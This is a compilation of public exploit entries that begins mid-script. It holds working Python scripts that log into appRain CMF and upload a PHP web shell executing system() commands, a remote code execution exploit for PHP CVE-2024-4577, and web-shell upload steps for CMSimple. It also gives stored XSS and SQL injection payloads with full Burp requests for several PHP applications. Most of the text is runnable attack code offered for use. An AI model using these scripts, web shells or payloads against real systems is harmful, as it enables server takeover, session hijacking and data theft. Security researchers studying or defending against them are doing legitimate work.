"/modules/elfinder/ef/php/connector.wbce.php", files=files, data=data) if response.status_code == 200: print("Your Shell is Ready: " + url + "/media/shell.inc") else: print("Failed to upload file.") print(response.text) if __name__ == "__main__": url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(url, username, password) if session: upload_file(session, url)

# Exploit Title: CMSimple 5.15 - Remote Command Execution # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.cmsimple.org # Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip # Version: latest # Tested on: MacOS # Log in to SimpleCMS. # Go to Settings > CMS # Append ",php" to the end of the Extensions_userfiles field and save it. # Navigate to Files > Media # Select and upload shell.php # Your shell is ready: https://{url}/userfiles/media/shell.php

# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated) # Date: 04/28/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.apprain.org # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip # Version: latest # Tested on: MacOS import requests import sys import time import random import string def generate_filename(): """ Generate a 5-character random string for filename. """ return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc" def login(site, username, password): print("Logging in...") time.sleep(2) login_url = f"https://{site}/admin/system" session = requests.Session() login_data = { 'data[Admin][admin_id]': username, 'data[Admin][admin_password]': password } headers = { 'Content-Type': 'application/x-www-form-urlencoded' } response = session.post(login_url, data=login_data, headers=headers) if "Logout" in response.text: print("Login Successful!") return session else: print("Login Failed!") sys.exit() def upload_shell(session, site): print("Shell preparing...") time.sleep(2) filename = generate_filename() upload_url = f"https://{site}/admin/filemanager/upload" files = { 'data[filemanager][image]': (filename, "<html><body><form method='GET' name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT' name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT' value='Execute'></form><pre><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg') } data = { 'submit': 'Upload' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200 and "uploaded successfully" in response.text: print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}") else: print("Exploit Failed!") sys.exit() if __name__ == "__main__": print("Exploiting...") time.sleep(2) if len(sys.argv) != 4: print("Usage: python exploit.py sitename.com username password") sys.exit() site = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = login(site, username, password) upload_shell(session, site)

# Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS) # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36599 # Description: ---------------- A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php. # Payload: ---------------- <script>alert(document.domain)</script> # Attack Vectors: ------------------------- To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS. # Burp Suite Request: ---------------------------- POST /lims/insertClient.php HTTP/1.1 Host: localhost Content-Length: 30423 Cache-Control: max-age=0 sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/lims/addClient.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_id" 1716051159 ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="client_password" password ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="name" <script>alert(document.domain)</script> ------WebKitFormBoundarymKfAe0x95923LzQH Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original" Content-Type: application/octet-stream ÿØÿà

# Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored) # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.94cb.com/ # Software Link: https://github.com/lincanbin/Carbon-Forum # Version: 5.9.0 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in Carbon Forum version 5.9.0. The vulnerability allows an attacker to inject malicious JavaScript code into the Forum Name field under the admin settings. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ## Steps to Reproduce 1. Login as Admin: Access the Carbon Forum with admin privileges. 2. Navigate to Settings: Go to the '/dashboard' and select the Basic section. 3. Enter Payload : Input the following payload in the Forum Name field: <script>alert('XSS');</script> 4. Save Settings: Save the changes. 5. The xss payload will triggers

# Exploit Title: Persistent XSS in XMB 1.9.12.06 # Date: 06/12/2024 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.xmbforum2.com/ # Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip # Version: 1.9.12.06 # Tested on: Windows XP # CVE: N/A ## Vulnerability Details A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06. The vulnerability allows an attacker to inject malicious JavaScript code into a template or specific fields. This payload is stored on the server and executed in the browser of any user who visits the forum, leading to potential session hijacking, data theft, and other malicious activities. ### XSS in Template An attacker can inject malicious JavaScript code into a template: 1. Login as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look & Feel" select "Templates". This will go to `/cp2.php?action=templates`. Select the "footer" template and click edit. 3. Enter Payload: Add the XSS payload in the footer template: <script>alert('XSS');</script> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the footer template is rendered. ### XSS in News Ticker An attacker can inject malicious JavaScript code into the News Ticker field of the Front Page Options: 1. Login as Admin: Access the XMB Forum with admin privileges. 2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Settings" go to "Front Page Options". 3. Enter Payload: Add the XSS payload in the "News in Newsticker" field: <img src=x onerror=alert(1)> 4. Save the Change: Click "Submit Changes". 5. Trigger the Payload: The XSS payload will trigger anywhere the News Ticker is displayed eg, home page

# Exploit Title: Life Insurance Management System- SQL injection vulnerability. # Exploit Author: Aslam Anwar Mahimkar # Date: 18-05-2024 # Category: Web application # Vendor Homepage: https://projectworlds.in/ # Software Link: https://projectworlds.in/life-insurance-management-system-in-php/ # Version: AEGON LIFE v1.0 # Tested on: Linux # CVE: CVE-2024-36597 # Description: ---------------- Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users. # Payload: ------------------ client_id=1511986023%27%20OR%201=1%20--%20a # Steps to reproduce -------------------------- -Login with your creds -Navigate to this directory - /client.php -Click on client Status -Will navigate to /clientStatus.php -Capture the request in burp and inject SQLi query in client_id= filed # Burp Request ------------------- GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1 Host: localhost sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n Connection: close

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.php.net/downloads.php # Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29 # CVE : CVE-2024-4577 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ | | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py ''') def exploit(url, command): payloads = { '<?php echo "vulnerable"; ?>', '<?php echo shell_exec("'+command+'"); ?>' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'Content-Type': 'application/x-www-form-urlencoded'} s = Session() for payload in payloads: url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" req = Request('POST', url, data=payload, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15) #print(prepped.headers) #print(url) #print(resp.headers) #print(payload) print(resp.status_code) print(resp.text) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])